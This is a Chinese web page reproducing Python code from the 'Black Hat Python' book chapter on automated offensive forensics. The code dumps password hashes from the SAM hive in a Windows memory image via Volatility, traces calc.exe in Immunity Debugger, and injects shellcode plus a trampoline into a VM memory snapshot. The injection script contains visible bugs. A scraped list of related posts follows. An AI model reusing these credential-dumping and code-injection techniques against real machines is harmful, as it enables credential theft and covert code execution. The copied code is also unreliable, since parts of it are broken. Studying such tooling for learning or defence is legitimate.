《Python黑帽子:黑客与渗透测试编程之道》 自动化攻击取证
import sys
import struct memory_file = "WinXPenSP3-Snapshot8.vmem"
sys.path.append("C:\\Python27\\volatility-2.3.1") import volatility.conf as conf
import volatility.registry as registry registry.PluginImporter()
config = conf.ConfObject() import volatility.commands as commands
import volatility.addrspace as addrspace config.parse_options()
config.PROFILE = "WinXPenSP3x86"
config.LOCALTION = "file://%s"%memory_file registry.register_global_options(config,commands.Command)
registry.register_global_options(config,addrspace.BaseAddressSpace) from volatility.plugins.registry.registryapi import RegistryApi
from volatility.plugins.registry.lsadump import HashDump registry = RegistryApi(config)
registry.populate_offsets() sam_offset = None
sys_offset = None for offset in registry.all_offsets:
if registry.all_offsets[offset].endswith("\\SAM"):
sam_offset = offset
print "[*] SAM: 0x%08x"%offset if registry.all_offsets[offset].endswith("\\system"):
sys_offset = offset
print "[*] System: 0x%08x"%offset
if sam_offset is not None and sys_offset is not None:
config.sys_offset = sys_offset
config.sam_offset = sam_offset hashdump = HashDump(config) for hash in hashdump.calculate():
print hash break if sam_offset is None or sys_offset is None:
print "[*] Failed to find the system or SAM offsets."
直接代码注入
from immlib import * class cc_hook(LogBpHook):
"""docstring for cc_hook"""
def __init__(self,):
LogBpHook.__init__(self)
self.imm = Debugger() def run(self,regs):
self.imm.log("%08x"%regs['EIP'],regs['EIP'])
self.imm.deleteBreakpoint(regs['EIP']) return def main(args):
imm = Debugger() calc = imm.getModule("calc.exe")
imm.analyseCode(calc.getCodebase()) functions = imm.getAllFunctions(calc.getCodebase())
hooker = cc_hook() for function in functions:
hooker.add("%08x"%function,function) return "Tracking %d functions."%len(functions)
#coding=utf-8
import sys
import struct equals_button = 0x01005D51 memory_file = "WinXPenSP3-Snapshot8.vmem"
slack_space = None
trampoline_offset = None #读入我们的shellcode
sc_fd = open("cmeasure.bin","rb")
sc = sc_fd.read()
sc_fd.close() sys.path.append("C:\\Python27\\volatility-2.3.1") import volatility.conf as conf
import volatility.registry as registry registry.PluginImporter()
config = conf.ConfObject() import volatility.commands as commands
import volatility.addrspace as addrspace config.parse_options()
config.PROFILE = "WinXPSP3x86"
config.LOCALTION = "file://%s"%memory_file import volatility.plugins.taskmods as taskmods p = taskmods.PSList(config) for process in p.calculate():
if str(process.ImageFileName) == "calc.exe":
print "[*] Found calc.exe with PID %d"%process.UniqueProcessId
print "[*] Hunting for physical offsets...please wait." address_space = process.get_process_address_space()
pages = address_space.get_available_pages() for page in pages:
physical = address_space.vtop(page[0])
if physical is not None:
if slack_space is None:
fd = open(memory_file,"r+")
fd.seek(physical)
buf = fd.read(page[1]) try:
offset = buf.index("\x00"*len(sc))
slack_space = page[0] + offset print "[*] Found good shellcode location!"
print "[*] Virtual address: 0x%08x"%slack_space
print "[*] Physical address: 0x%08x"%(physical + offset)
print "[*] Injecting shellcode." fd.seek(physical + offset)
fd.write(sc)
fd.close() #创建我们的跳转代码
tramp = "\xbb%s"%struct.pack("<L",page[0] + offset)
tramp += "\xff\xe3" if trampoline_offset is not None:
break except:
pass fd.close() #查看目标代码的位置
if page[0] <= equals_button and equals_button < ((page[0] + page[1]) - 7):
print "[*] Found our trampoline target at: 0x%08x"%(physical) #计算虚拟偏移
v_offset = equals_button = page[0] #计算物理偏移
trampoline_offset = physical + v_offset print "[*] Found our trampoline target at: 0x%08x"%(trampoline_offset) if slack_space is not None:
break print "[*] Writing trampoline..." fd = open(memory_file,"r+")
fd.seek(trampoline_offset)
fd.write(tramp)
f.close() print "[*] Done injecting code."
《Python黑帽子:黑客与渗透测试编程之道》 自动化攻击取证的更多相关文章
- python黑帽子-黑客与渗透测试编程之道(源代码)
链接: https://pan.baidu.com/s/1i5BnB5V 密码: ak9t
- 读书笔记 ~ Python黑帽子 黑客与渗透测试编程之道
Python黑帽子 黑客与渗透测试编程之道 <<< 持续更新中>>> 第一章: 设置python 环境 1.python软件包管理工具安装 root@star ...
- 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道
python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...
- 《Python黑帽子:黑客与渗透测试编程之道》 扩展Burp代理
下载jython,在Burpsuite的扩展中配置jython路径: Burp模糊测试: #!/usr/bin/python #coding=utf-8 # 导入三个类,其中IBurpExtender ...
- 《Python黑帽子:黑客与渗透测试编程之道》 Web攻击
Web的套接字函数库:urllib2 一开始以urllib2.py命名脚本,在Sublime Text中运行会出错,纠错后发现是重名了,改过来就好: #!/usr/bin/python #coding ...
- 《Python黑帽子:黑客与渗透测试编程之道》 Scapy:网络的掌控者
窃取email认证: 测试代码: #!/usr/bin/python #coding=utf-8 from scapy.all import * #数据包回调函数 def packet_callbac ...
- 《Python黑帽子:黑客与渗透测试编程之道》 网络基础
TCP客户端: 示例中socket对象有两个参数,AF_INET参数表明使用IPv4地址或主机名 SOCK_STREAM参数表示是一个TCP客户端.访问的URL是百度. #coding=utf-8 i ...
- 《Python黑帽子:黑客与渗透测试编程之道》 玩转浏览器
基于浏览器的中间人攻击: #coding=utf-8 import win32com.client import time import urlparse import urllib data_rec ...
- 《Python黑帽子:黑客与渗透测试编程之道》 Windows下木马的常用功能
有趣的键盘记录: 安装pyHook: http://nchc.dl.sourceforge.net/project/pyhook/pyhook/1.5.1/pyHook-1.5.1.win32-py2 ...
- 《Python黑帽子:黑客与渗透测试编程之道》 基于GitHub的命令和控制
GitHub账号设置: 这部分按书上来敲命令即可,当然首先要注册一个GitHub账号还有之前安装的GitHub API库(pip install github3.py),这里就只列一下命令吧: mkd ...
随机推荐
- 【RabbitMQ】 RabbitMQ配置开机启动
环境 系统:Linux(CentOS 7.2) Erlang环境:21.1(安装参考[Erlang]源码安装) RabbitMQ:3.7.9(安装参考[RabbitMQ] RabbitMQ安装) 配置 ...
- JS高级-String- RegExp- Math- Date:
1. String: 切割: 将一个字符串,按指定分隔符,切割为多段子字符串 简单切割: 切割符是固定的 var arr=str.split("切割符") 强调: 切割后的结果中, ...
- unity的三种update
void FixedUpdate () 固定更新 void Update () 更新 void LateUpdate() 晚于更新 FixedUpdate () 和 Update () ...
- s4-7 生成树协议
Spanning Tree :为了可靠,采用冗余结构:但是透明网桥 会产生无休止循环的问题 冗余交换拓扑可能带来的问题 广播风暴 多帧传送 MAC地址库不稳定 生成树协议 STP:sp ...
- SVN previous operation has not finished
svn提交遇到恶心的问题,可能是因为上次cleanup中断后,进入死循环了. 错误如下: 解决方法:清空svn的队列 1.下载sqlite3.exe 2.找到你项目的.svn文件,查看是否存在wc.d ...
- Mysql中Left Join Right Join Inner Join where条件的比较
建立一对多的表 company 和 employee company表 id name address 1baidu北京 2huawei深圳 3jingdong北京 4tengxu ...
- 树形控件(CTreeCtrl和CTreeView)
如何插入数据项目? 如何添加鼠标右击事件? 插入数据项 通过InsertItem()方法,有四种重载样式: HTREEITEM InsertItem(LPTVINSERTSTRUCT lpInsert ...
- 2.1.6synchronized锁重入
关键字在使用synchronized时,当线程得到一个对象锁时,这时这个线程再次请求此对象锁是可以拿到的,也就说明同步方法之间是可以进行互相调用的, package com.cky.bean; /** ...
- 【20171101】the first day in a new company
英文差的要命还飙英文,擦嘞!!! 就是想记录下 点滴 如下配图: | | | V 手动配图这是图!!!
- python标准库及其它应用
一: sys模块的介绍: 程序如下: #coding:utf-8import sysprint sys.argv[0]print sys.argv[1]print sys.argv[2] 打开cmd窗 ...